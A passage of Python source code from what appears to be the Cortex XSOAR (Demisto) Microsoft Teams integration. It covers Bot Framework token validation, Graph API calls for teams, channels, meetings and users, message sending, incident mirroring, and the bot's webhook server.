open_id_url: str = 'https://login.botframework.com/v1/.well-known/openidconfiguration'
response: requests.Response = requests.get(open_id_url, verify=USE_SSL)
if not response.ok:
demisto.info(f'Authorization header validation failed to fetch open ID config - {response.reason}')
return False
response_json: dict = response.json()
jwks_uri: str = response_json.get('jwks_uri', '')
keys_response: requests.Response = requests.get(jwks_uri, verify=USE_SSL)
if not keys_response.ok:
demisto.info(f'Authorization header validation failed to fetch keys - {response.reason}')
return False
keys_response_json: dict = keys_response.json()
keys = keys_response_json.get('keys', [])
open_id_metadata['keys'] = keys
except ValueError:
demisto.info('Authorization header validation - failed to parse keys response')
return False
if not keys:
# Didn't get new keys
demisto.info('Authorization header validation - failed to get keys')
return False
# Find requested key in new keys
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in new keys
demisto.info('Authorization header validation - failed to find relevant key')
return False
endorsements: list = key_object.get('endorsements', [])
if not endorsements or 'msteams' not in endorsements:
demisto.info('Authorization header validation - failed to verify endorsements')
return False
public_key: str = RSAAlgorithm.from_jwk(json.dumps(key_object))
options = {
'verify_aud': False,
'verify_exp': True
}
decoded_payload = jwt.decode(jwt_token, public_key, options=options)
audience_claim: str = decoded_payload.get('aud', '')
if audience_claim != demisto.params().get('bot_id'):
demisto.info('Authorization header validation - failed to verify audience_claim')
return False
integration_context['open_id_metadata'] = json.dumps(open_id_metadata)
set_integration_context(integration_context)
return True
''' COMMANDS + REQUESTS FUNCTIONS '''
def get_team_aad_id(team_name: str) -> str:
"""
Gets Team AAD ID
:param team_name: Team name to get AAD ID of
:return: team AAD ID
"""
integration_context: dict = get_integration_context()
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team_name == team.get('team_name', ''):
return team.get('team_aad_id', '')
url: str = f"{GRAPH_BASE_URL}/beta/groups?$filter=resourceProvisioningOptions/Any(x:x eq 'Team')"
response: dict = cast(Dict[Any, Any], http_request('GET', url))
teams = response.get('value', [])
for team in teams:
if team.get('displayName', '') == team_name:
return team.get('id', '')
raise ValueError('Could not find requested team.')
# def add_member_to_team(user_principal_name: str, team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/groups/{team_id}/members/$ref'
# requestjson_: dict = {
# '@odata.id': f'{GRAPH_BASE_URL}/v1.0/directoryObjects/{user_principal_name}'
# }
# http_request('POST', url, json_=requestjson_)
def get_user(user: str) -> list:
"""Retrieves the AAD ID of requested user
Args:
user (str): Display name/mail/UPN of user to get ID of.
Return:
list: List containing the requsted user object
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/users'
params = {
'$filter': f"displayName eq '{user}' or mail eq '{user}' or userPrincipalName eq '{user}'",
'$select': 'id'
}
users = cast(Dict[Any, Any], http_request('GET', url, params=params))
return users.get('value', [])
def add_user_to_channel(team_aad_id: str, channel_id: str, user_id: str):
"""
Request for adding user to channel
"""
url: str = f'{GRAPH_BASE_URL}/beta/teams/{team_aad_id}/channels/{channel_id}/members'
requestjson_: dict = {
'@odata.type': '#microsoft.graph.aadUserConversationMember',
'roles': [],
'user@odata.bind': f'https://graph.microsoft.com/beta/users/{user_id}' # disable-secrets-detection
}
http_request('POST', url, json_=requestjson_)
def add_user_to_channel_command():
"""
Add user to channel (private channel only as still in beta mode)
"""
channel_name: str = demisto.args().get('channel', '')
team_name: str = demisto.args().get('team', '')
member = demisto.args().get('member', '')
user: list = get_user(member)
if not (user and user[0].get('id')):
raise ValueError(f'User {member} was not found')
team_aad_id = get_team_aad_id(team_name)
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id=None)
add_user_to_channel(team_aad_id, channel_id, user[0].get('id'))
demisto.results(f'The User "{member}" has been added to channel "{channel_name}" successfully.')
# def create_group_request(
# display_name: str, mail_enabled: bool, mail_nickname: str, security_enabled: bool,
# owners_ids: list, members_ids: list = None
# ) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups'
# data: dict = {
# 'displayName': display_name,
# 'groupTypes': ['Unified'],
# 'mailEnabled': mail_enabled,
# 'mailNickname': mail_nickname,
# 'securityEnabled': security_enabled,
# 'owners@odata.bind': owners_ids,
# 'members@odata.bind': members_ids or owners_ids
# }
# group_creation_response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=data))
# group_id: str = group_creation_response.get('id', '')
# return group_id
#
#
# def create_team_request(group_id: str) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups/{group_id}/team'
# team_creation_response: dict = cast(Dict[Any, Any], http_request('PUT', url, json_={}))
# team_id: str = team_creation_response.get('id', '')
# return team_id
#
#
# def add_bot_to_team(team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_id}/installedApps'
# bot_app_id: str = ''
# data: dict = {
# 'teamsApp@odata.bind': f'https://graph.microsoft.com/v1.0/appCatalogs/teamsApps/{bot_app_id}'
# }
# print(http_request('POST', url, json_=data))
#
#
# def create_team():
# display_name: str = demisto.args().get('display_name', '')
# mail_enabled: bool = bool(strtobool(demisto.args().get('mail_enabled', True)))
# mail_nickname: str = demisto.args().get('mail_nickname', '')
# security_enabled: bool = bool(strtobool(demisto.args().get('security_enabled', True)))
# owners = argToList(demisto.args().get('owner', ''))
# members = argToList(demisto.args().get('members', ''))
# owners_ids: list = list()
# members_ids: list = list()
# users: list = get_users()
# user_id: str = str()
# for member in members:
# found_member: bool = False
# for user in users:
# if member in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_member = True
# user_id = user.get('id', '')
# members_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_member:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {member} was not found',
# 'ContentsFormat': formats['text']
# })
# for owner in owners:
# found_owner: bool = False
# for user in users:
# if owner in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_owner = True
# user_id = user.get('id', '')
# owners_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_owner:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {owner} was not found',
# 'ContentsFormat': formats['text']
# })
# if not owners_ids:
# raise ValueError('Could not find given users to be Team owners.')
# group_id: str = create_group_request(
# display_name, mail_enabled, mail_nickname, security_enabled, owners_ids, members_ids
# )
# team_id: str = create_team_request(group_id)
# add_bot_to_team(team_id)
# demisto.results(f'Team {display_name} was created successfully')
def create_channel(team_aad_id: str, channel_name: str, channel_description: str = '') -> str:
"""
Creates a Microsoft Teams channel
:param team_aad_id: Team AAD ID to create channel in
:param channel_name: Name of channel to create
:param channel_description: Description of channel to create
:return: ID of created channel
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
request_json: dict = {
'displayName': channel_name,
'description': channel_description
}
channel_data: dict = cast(Dict[Any, Any], http_request('POST', url, json_=request_json))
channel_id: str = channel_data.get('id', '')
return channel_id
def create_meeting(user_id: str, subject: str, start_date_time: str, end_date_time: str) -> dict:
"""
Creates a Microsoft Teams meeting
:param user_id: The User's ID
:param subject: The meeting's subject
:param start_date_time: The meeting's start time
:param end_date_time: The meeting's end time
:return: Dict with info about the created meeting.
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/users/{user_id}/onlineMeetings'
request_json: dict = {
'subject': subject
}
if start_date_time:
request_json['startDateTime'] = start_date_time
if end_date_time:
request_json['endDateTime'] = end_date_time
channel_data: dict = cast(Dict[Any, Any], http_request('POST', url, json_=request_json))
return channel_data
def create_channel_command():
channel_name: str = demisto.args().get('channel_name', '')
channel_description: str = demisto.args().get('description', '')
team_name: str = demisto.args().get('team', '')
team_aad_id = get_team_aad_id(team_name)
channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
if channel_id:
demisto.results(f'The channel "{channel_name}" was created successfully')
def create_meeting_command():
subject: str = demisto.args().get('subject', '')
start_date_time: str = demisto.args().get('start_time', '')
end_date_time: str = demisto.args().get('end_time', '')
member = demisto.args().get('member', '')
user: list = get_user(member)
if not (user and user[0].get('id')):
raise ValueError(f'User {member} was not found')
meeting_data: dict = create_meeting(user[0].get('id'), subject, start_date_time, end_date_time)
thread_id = ''
message_id = ''
if chat_info := meeting_data.get('chatInfo', {}):
thread_id = chat_info.get('threadId', '')
message_id = chat_info.get('messageId', '')
participant_id, participant_display_name = get_participant_info(meeting_data.get('participants', {}))
outputs = {
'creationDateTime': meeting_data.get('creationDateTime', ''),
'threadId': thread_id,
'messageId': message_id,
'id': meeting_data.get('id', ''),
'joinWebUrl': meeting_data.get('joinWebUrl', ''),
'participantId': participant_id,
'participantDisplayName': participant_display_name
}
result = CommandResults(
readable_output=f'The meeting "{subject}" was created successfully',
outputs_prefix='MicrosoftTeams.CreateMeeting',
outputs_key_field='id',
outputs=outputs
)
return_results(result)
def get_participant_info(participants: dict) -> Tuple[str, str]:
"""
Retrieves the participant ID and name
:param participants: The participants in the Team meeting
:return: The participant ID and name
"""
participant_id = ''
participant_display_name = ''
if participants:
user = participants.get('organizer', {}).get('identity', {}).get('user', {})
if user:
participant_id = user.get('id')
participant_display_name = user.get('displayName')
return participant_id, participant_display_name
def get_channel_id(channel_name: str, team_aad_id: str, investigation_id: str = None) -> str:
"""
Retrieves Microsoft Teams channel ID
:param channel_name: Name of channel to get ID of
:param team_aad_id: AAD ID of team to search channel in
:param investigation_id: Demisto investigation ID to search mirrored channel of
:return: Requested channel ID
"""
investigation_id = investigation_id or str()
integration_context: dict = get_integration_context()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
if channel.get('channel_name') == channel_name or channel.get('investigation_id') == investigation_id:
return channel.get('channel_id')
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
response: dict = cast(Dict[Any, Any], http_request('GET', url))
channel_id: str = ''
channels: list = response.get('value', [])
for channel in channels:
channel_display_name: str = channel.get('displayName', '')
if channel_display_name == channel_name:
channel_id = channel.get('id', '')
break
if not channel_id:
raise ValueError(f'Could not find channel: {channel_name}')
return channel_id
def get_team_members(service_url: str, team_id: str) -> list:
"""
Retrieves team members given a team
:param team_id: ID of team to get team members of
:param service_url: Bot service URL to query
:return: List of team members
"""
url: str = f'{service_url}/v3/conversations/{team_id}/members'
response: list = cast(List[Any], http_request('GET', url, api='bot'))
return response
def update_message(service_url: str, conversation_id: str, activity_id: str, text: str):
"""
Updates a message in Microsoft Teams channel
:param service_url: Bot service URL to query
:param conversation_id: Conversation ID of message to update
:param activity_id: Activity ID of message to update
:param text: Text to update in the message
:return: None
"""
body = [{
'type': 'TextBlock',
'text': text
}]
adaptive_card: dict = create_adaptive_card(body=body)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
url: str = f'{service_url}/v3/conversations/{conversation_id}/activities/{activity_id}'
http_request('PUT', url, json_=conversation, api='bot')
def close_channel_request(team_aad_id: str, channel_id: str):
"""
Sends an HTTP request to close a Microsoft Teams channel
:param team_aad_id: AAD ID of team to close the channel in
:param channel_id: ID of channel to close
:return: None
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels/{channel_id}'
http_request('DELETE', url)
def close_channel():
"""
Deletes a mirrored Microsoft Teams channel
"""
integration_context: dict = get_integration_context()
channel_name: str = demisto.args().get('channel', '')
investigation: dict = demisto.investigation()
investigation_id: str = investigation.get('id', '')
channel_id: str = str()
team_aad_id: str
mirrored_channels: list
if not channel_name:
# Closing channel as part of autoclose in mirroring process
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_aad_id = team.get('team_aad_id', '')
mirrored_channels = team.get('mirrored_channels', [])
for channel_index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
channel_id = channel.get('channel_id', '')
close_channel_request(team_aad_id, channel_id)
mirrored_channels.pop(channel_index)
team['mirrored_channels'] = mirrored_channels
break
if not channel_id:
raise ValueError('Could not find Microsoft Teams channel to close.')
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
else:
team_name: str = demisto.args().get('team') or demisto.params().get('team')
team_aad_id = get_team_aad_id(team_name)
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
close_channel_request(team_aad_id, channel_id)
demisto.results('Channel was successfully closed.')
def create_personal_conversation(integration_context: dict, team_member_id: str) -> str:
"""
Create a personal conversation with a team member
:param integration_context: Cached object to retrieve relevant data for the conversation creation
:param team_member_id: ID of team member to create a conversation with
:return: ID of created conversation
"""
bot_id: str = demisto.params().get('bot_id', '')
bot_name: str = integration_context.get('bot_name', '')
tenant_id: str = integration_context.get('tenant_id', '')
conversation: dict = {
'bot': {
'id': f'28:{bot_id}',
'name': bot_name
},
'members': [{
'id': team_member_id
}],
'channelData': {
'tenant': {
'id': tenant_id
}
}
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
url: str = f'{service_url}/v3/conversations'
response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=conversation, api='bot'))
return response.get('id', '')
def send_message_request(service_url: str, channel_id: str, conversation: dict):
"""
Sends an HTTP request to send message to Microsoft Teams
:param channel_id: ID of channel to send message in
:param conversation: Conversation message object to send
:param service_url: Bot service URL to query
:return: None
"""
url: str = f'{service_url}/v3/conversations/{channel_id}/activities'
http_request('POST', url, json_=conversation, api='bot')
def process_mentioned_users_in_message(message: str) -> Tuple[list, str]:
"""
Processes the message to include all mentioned users in the right format. For example:
Input: 'good morning @Demisto'
Output (Formatted message): 'good morning <at>@Demisto</at>'
:param message: The message to be processed
:return: A list of the mentioned users, The processed message
"""
mentioned_users: list = [''.join(user) for user in re.findall(MENTION_REGEX, message)]
for user in mentioned_users:
message = message.replace(f'@{user};', f'<at>@{user}</at>')
return mentioned_users, message
def mentioned_users_to_entities(mentioned_users: list, integration_context: dict) -> list:
"""
Returns a list of entities built from the mentioned users
:param mentioned_users: A list of mentioned users in the message
:param integration_context: Cached object to retrieve relevant data from
:return: A list of entities
"""
return [{'type': 'mention', 'mentioned': {'id': get_team_member_id(user, integration_context), 'name': user},
'text': f'<at>@{user}</at>'} for user in mentioned_users]
def send_message():
message_type: str = demisto.args().get('messageType', '')
original_message: str = demisto.args().get('originalMessage', '')
message: str = demisto.args().get('message', '')
try:
adaptive_card: dict = json.loads(demisto.args().get('adaptive_card', '{}'))
except ValueError:
raise ValueError('Given adaptive card is not in valid JSON format.')
if message_type == MESSAGE_TYPES['mirror_entry'] and ENTRY_FOOTER in original_message:
# Got a message which was already mirrored - skipping it
return
channel_name: str = demisto.args().get('channel', '')
if (not channel_name and message_type in {MESSAGE_TYPES['status_changed'], MESSAGE_TYPES['incident_opened']}) \
or channel_name == INCIDENT_NOTIFICATIONS_CHANNEL:
# Got a notification from server
channel_name = demisto.params().get('incident_notifications_channel', 'General')
severity: int = int(demisto.args().get('severity'))
severity_threshold: int = translate_severity(demisto.params().get('min_incident_severity', 'Low'))
if severity < severity_threshold:
return
team_member: str = demisto.args().get('team_member', '') or demisto.args().get('to', '')
if not (team_member or channel_name):
raise ValueError('No channel or team member to send message were provided.')
if team_member and channel_name:
raise ValueError('Provide either channel or team member to send message to, not both.')
if not (message or adaptive_card):
raise ValueError('No message or adaptive card to send were provided.')
if message and adaptive_card:
raise ValueError('Provide either message or adaptive to send, not both.')
integration_context: dict = get_integration_context()
channel_id: str = str()
personal_conversation_id: str = str()
if channel_name:
team_name: str = demisto.args().get('team', '') or demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
investigation_id: str = str()
if message_type == MESSAGE_TYPES['mirror_entry']:
# Got an entry from the War Room to mirror to Teams
# Getting investigation ID in case channel name is custom and not the default
investigation: dict = demisto.investigation()
investigation_id = investigation.get('id', '')
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
elif team_member:
team_member_id: str = get_team_member_id(team_member, integration_context)
personal_conversation_id = create_personal_conversation(integration_context, team_member_id)
recipient: str = channel_id or personal_conversation_id
conversation: dict
if message:
entitlement_match: Optional[Match[str]] = re.search(ENTITLEMENT_REGEX, message)
if entitlement_match:
# In TeamsAsk process
adaptive_card = process_ask_user(message)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
else:
# Sending regular message
formatted_message: str = urlify_hyperlinks(message)
mentioned_users, formatted_message_with_mentions = process_mentioned_users_in_message(formatted_message)
entities = mentioned_users_to_entities(mentioned_users, integration_context)
demisto.info(f'msg: {formatted_message_with_mentions}, ent: {entities}')
conversation = {
'type': 'message',
'text': formatted_message_with_mentions,
'entities': entities
}
else: # Adaptive card
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, recipient, conversation)
demisto.results('Message was sent successfully.')
def mirror_investigation():
"""
Updates the integration context with a new or existing mirror.
"""
investigation: dict = demisto.investigation()
if investigation.get('type') == PLAYGROUND_INVESTIGATION_TYPE:
raise ValueError('Can not perform this action in playground.')
integration_context: dict = get_integration_context()
mirror_type: str = demisto.args().get('mirror_type', 'all')
auto_close: str = demisto.args().get('autoclose', 'true')
mirror_direction: str = demisto.args().get('direction', 'both').lower()
team_name: str = demisto.args().get('team', '')
if not team_name:
team_name = demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
mirrored_channels: list = list()
teams: list = json.loads(integration_context.get('teams', '[]'))
team: dict = dict()
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
if team.get('mirrored_channels'):
mirrored_channels = team['mirrored_channels']
break
if mirror_direction != 'both':
mirror_type = f'{mirror_type}:{mirror_direction}'
investigation_id: str = investigation.get('id', '')
investigation_mirrored_index: int = is_investigation_mirrored(investigation_id, mirrored_channels)
if investigation_mirrored_index > -1:
# Updating channel mirror configuration
mirrored_channels[investigation_mirrored_index]['mirror_type'] = mirror_type
mirrored_channels[investigation_mirrored_index]['mirror_direction'] = mirror_direction
mirrored_channels[investigation_mirrored_index]['auto_close'] = auto_close
mirrored_channels[investigation_mirrored_index]['mirrored'] = False
demisto.results('Investigation mirror was updated successfully.')
else:
channel_name: str = demisto.args().get('channel_name', '') or f'incident-{investigation_id}'
channel_description: str = f'Channel to mirror incident {investigation_id}'
channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
service_url: str = integration_context.get('service_url', '')
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
warroom_link: str = f'{server_link}#/WarRoom/{investigation_id}'
conversation: dict = {
'type': 'message',
'text': f'This channel was created to mirror [incident {investigation_id}]({warroom_link}) '
f'between Teams and Demisto. In order for your Teams messages to be mirrored in Demisto, '
f'you need to mention the Demisto Bot in the message.'
}
send_message_request(service_url, channel_id, conversation)
mirrored_channels.append({
'channel_id': channel_id,
'investigation_id': investigation_id,
'mirror_type': mirror_type,
'mirror_direction': mirror_direction,
'auto_close': auto_close,
'mirrored': False,
'channel_name': channel_name
})
demisto.results(f'Investigation mirrored successfully in channel {channel_name}.')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
def channel_mirror_loop():
"""
Runs in a long running container - checking for newly mirrored investigations.
"""
while True:
found_channel_to_mirror: bool = False
integration_context = get_integration_context()
try:
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels = team.get('mirrored_channels', [])
channel: dict
for channel in mirrored_channels:
investigation_id = channel.get('investigation_id', '')
if not channel['mirrored']:
demisto.info(f'Mirroring incident: {investigation_id} in Microsoft Teams')
channel_to_update: dict = channel
if channel_to_update['mirror_direction'] and channel_to_update['mirror_type']:
demisto.mirrorInvestigation(
channel_to_update['investigation_id'],
channel_to_update['mirror_type'],
bool(strtobool(channel_to_update['auto_close']))
)
channel_to_update['mirrored'] = True
demisto.info(f'Mirrored incident: {investigation_id} to Microsoft Teams successfully')
else:
demisto.info(f'Could not mirror {investigation_id}')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
found_channel_to_mirror = True
break
if found_channel_to_mirror:
break
except json.decoder.JSONDecodeError as json_decode_error:
demisto.error(
f'An error occurred in channel mirror loop while trying to deserialize teams from cache: '
f'{str(json_decode_error)}'
)
demisto.debug(f'Cache object: {integration_context}')
demisto.updateModuleHealth(f'An error occurred: {str(json_decode_error)}')
except Exception as e:
demisto.error(f'An error occurred in channel mirror loop: {str(e)}')
demisto.updateModuleHealth(f'An error occurred: {str(e)}')
finally:
time.sleep(5)
def member_added_handler(integration_context: dict, request_body: dict, channel_data: dict):
"""
Handles member added activity
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:return: None
"""
bot_id = demisto.params().get('bot_id')
team: dict = channel_data.get('team', {})
team_id: str = team.get('id', '')
team_aad_id: str = team.get('aadGroupId', '')
team_name: str = team.get('name', '')
tenant: dict = channel_data.get('tenant', {})
tenant_id: str = tenant.get('id', '')
recipient: dict = request_body.get('recipient', {})
recipient_name: str = recipient.get('name', '')
members_added: list = request_body.get('membersAdded', [])
teams: list = json.loads(integration_context.get('teams', '[]'))
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
for member in members_added:
member_id = member.get('id', '')
if bot_id in member_id:
# The bot was added to a team, caching team ID and team members
demisto.info(f'The bot was added to team {team_name}')
integration_context['tenant_id'] = tenant_id
integration_context['bot_name'] = recipient_name
break
team_members: list = get_team_members(service_url, team_id)
found_team: bool = False
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
team['team_members'] = team_members
found_team = True
break
if not found_team:
# Didn't found an existing team, adding new team object
teams.append({
'team_aad_id': team_aad_id,
'team_id': team_id,
'team_name': team_name,
'team_members': team_members
})
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
def direct_message_handler(integration_context: dict, request_body: dict, conversation: dict, message: str):
"""
Handles a direct message sent to the bot
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param conversation: Conversation object sent
:param message: The direct message sent
:return: None
"""
conversation_id: str = conversation.get('id', '')
from_property: dict = request_body.get('from', {})
user_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, user_id)
username: str = team_member.get('username', '')
user_email: str = team_member.get('user_email', '')
formatted_message: str = str()
attachment: dict = dict()
return_card: bool = False
allow_external_incidents_creation: bool = demisto.params().get('allow_external_incidents_creation', False)
lowered_message = message.lower()
if lowered_message.find('incident') != -1 and (lowered_message.find('create') != -1
or lowered_message.find('open') != -1
or lowered_message.find('new') != -1):
if user_email:
demisto_user = demisto.findUser(email=user_email)
else:
demisto_user = demisto.findUser(username=username)
if not demisto_user and not allow_external_incidents_creation:
data = 'You are not allowed to create incidents.'
else:
data = process_incident_create_message(demisto_user, message)
formatted_message = urlify_hyperlinks(data)
else:
try:
data = demisto.directMessage(message, username, user_email, allow_external_incidents_creation)
return_card = True
if data.startswith('`'): # We got a list of incidents/tasks:
data_by_line: list = data.replace('```', '').strip().split('\n')
return_card = True
if data_by_line[0].startswith('Task'):
attachment = process_tasks_list(data_by_line)
else:
attachment = process_incidents_list(data_by_line)
else: # Mirror investigation command / unknown direct message
attachment = process_mirror_or_unknown_message(data)
except Exception as e:
data = str(e)
if return_card:
conversation = {
'type': 'message',
'attachments': [attachment]
}
else:
formatted_message = formatted_message or data
conversation = {
'type': 'message',
'text': formatted_message
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, conversation_id, conversation)
def entitlement_handler(integration_context: dict, request_body: dict, value: dict, conversation_id: str):
"""
Handles activity the bot received as part of TeamsAsk flow, which includes entitlement
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param value: Object which includes
:param conversation_id: Message conversation ID
:return: None
"""
response: str = value.get('response', '')
entitlement_guid: str = value.get('entitlement', '')
investigation_id: str = value.get('investigation_id', '')
task_id: str = value.get('task_id', '')
from_property: dict = request_body.get('from', {})
team_members_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, team_members_id)
demisto.handleEntitlementForUser(
incidentID=investigation_id,
guid=entitlement_guid,
taskID=task_id,
email=team_member.get('user_email', ''),
content=response
)
activity_id: str = request_body.get('replyToId', '')
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
update_message(service_url, conversation_id, activity_id, 'Your response was submitted successfully.')
def message_handler(integration_context: dict, request_body: dict, channel_data: dict, message: str):
"""
Handles a message in which the bot was mentioned
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:param message: The message which was sent mentioning the bot
:return: None
"""
channel: dict = channel_data.get('channel', {})
channel_id: str = channel.get('id', '')
team_id: str = channel_data.get('team', {}).get('id', '')
from_property: dict = request_body.get('from', {})
team_member_id: str = from_property.get('id', '')
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team.get('team_id', '') == team_id:
mirrored_channels: list = team.get('mirrored_channels', [])
for mirrored_channel in mirrored_channels:
if mirrored_channel.get('channel_id') == channel_id:
if mirrored_channel.get('mirror_direction', '') != 'FromDemisto' \
and 'none' not in mirrored_channel.get('mirror_type', ''):
investigation_id: str = mirrored_channel.get('investigation_id', '')
username: str = from_property.get('name', '')
user_email: str = get_team_member(integration_context, team_member_id).get('user_email', '')
demisto.addEntry(
id=investigation_id,
entry=message,
username=username,
email=user_email,
footer=f'\n**{ENTRY_FOOTER}**'
)
return
@APP.route('/', methods=['POST'])
def messages() -> Response:
"""
Main handler for messages sent to the bot
"""
demisto.debug('Processing POST query...')
headers: dict = cast(Dict[Any, Any], request.headers)
if validate_auth_header(headers) is False:
demisto.info(f'Authorization header failed: {str(headers)}')
else:
request_body: dict = request.json
integration_context: dict = get_integration_context()
service_url: str = request_body.get('serviceUrl', '')
if service_url:
service_url = service_url[:-1] if service_url.endswith('/') else service_url
integration_context['service_url'] = service_url
set_integration_context(integration_context)
channel_data: dict = request_body.get('channelData', {})
event_type: str = channel_data.get('eventType', '')
conversation: dict = request_body.get('conversation', {})
conversation_type: str = conversation.get('conversationType', '')
conversation_id: str = conversation.get('id', '')
message_text: str = request_body.get('text', '')
# Remove bot mention
bot_name = integration_context.get('bot_name', '')
formatted_message: str = message_text.replace(f'<at>{bot_name}</at>', '')
value: dict = request_body.get('value', {})
if event_type == 'teamMemberAdded':
demisto.info('New Microsoft Teams team member was added')
member_added_handler(integration_context, request_body, channel_data)
elif value:
# In TeamsAsk process
demisto.info('Got response from user in MicrosoftTeamsAsk process')
entitlement_handler(integration_context, request_body, value, conversation_id)
elif conversation_type == 'personal':
demisto.info('Got direct message to the bot')
direct_message_handler(integration_context, request_body, conversation, formatted_message)
else:
demisto.info('Got message mentioning the bot')
message_handler(integration_context, request_body, channel_data, formatted_message)
demisto.info('Finished processing Microsoft Teams activity successfully')
demisto.updateModuleHealth('')
return Response(status=200)
def ring_user_request(call_request_data):
return http_request(method='POST', url=f'{GRAPH_BASE_URL}/v1.0/communications/calls',
json_=call_request_data)
def ring_user():
"""Rings a user on Teams.
Notes:
This is a ring only! no media plays in case the generated call is answered.
Returns:
None.
"""
bot_id = demisto.params().get('bot_id')
integration_context: dict = get_integration_context()
tenant_id: str = integration_context.get('tenant_id', '')
if not tenant_id:
raise ValueError(
'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly. '
'See https://xsoar.pan.dev/docs/reference/integrations/microsoft-teams#troubleshooting for more information'
)
# get user to call name and id
username_to_call = demisto.args().get('username')
user: list = get_user(username_to_call)
if not (user and user[0].get('id')):
raise ValueError(f'User {username_to_call} was not found')
call_request_data = {
"@odata.type": "#microsoft.graph.call",
"callbackUri": 'https://callback.url',
"direction": "outgoing",
"source": {
"@odata.type": "#microsoft.graph.participantInfo",
"identity": {
"@odata.type": "#microsoft.graph.identitySet",
"application": {
"@odata.type": "#microsoft.graph.identity",
"id": bot_id
}
}
},
"targets": [
{
"@odata.type": "#microsoft.graph.invitationParticipantInfo",
"identity": {
"@odata.type": "#microsoft.graph.identitySet",
"user": {
"@odata.type": "#microsoft.graph.identity",
"displayName": username_to_call,
"id": user[0].get('id')
}
}
}
],
"requestedModalities": [
"audio"
],
"mediaConfig": {
"@odata.type": "#microsoft.graph.serviceHostedMediaConfig",
},
"tenantId": tenant_id
}
response = ring_user_request(call_request_data)
return_outputs(f"Calling {username_to_call}", {}, response)
def long_running_loop():
"""
The infinite loop which runs the mirror loop and the bot app in two different threads
"""
while True:
certificate: str = demisto.params().get('certificate', '')
private_key: str = demisto.params().get('key', '')
certificate_path = str()
private_key_path = str()
server = None
try:
port_mapping: str = PARAMS.get('longRunningPort', '')
port: int
if port_mapping:
if ':' in port_mapping:
port = int(port_mapping.split(':')[1])
else:
port = int(port_mapping)
else:
raise ValueError('No port mapping was provided')
Thread(target=channel_mirror_loop, daemon=True).start()
demisto.info('Started channel mirror loop thread')
ssl_args = dict()
if certificate and private_key:
certificate_file = NamedTemporaryFile(delete=False)
certificate_path = certificate_file.name
certificate_file.write(bytes(certificate, 'utf-8'))
certificate_file.close()
ssl_args['certfile'] = certificate_path
private_key_file = NamedTemporaryFile(delete=False)
private_key_path = private_key_file.name
private_key_file.write(bytes(private_key, 'utf-8'))
private_key_file.close()
ssl_args['keyfile'] = private_key_path
demisto.info('Starting HTTPS Server')
else:
demisto.info('Starting HTTP Server')
server = WSGIServer(('0.0.0.0', port), APP, **ssl_args)
demisto.updateModuleHealth('')
server.serve_forever()
except Exception as e:
error_message = str(e)
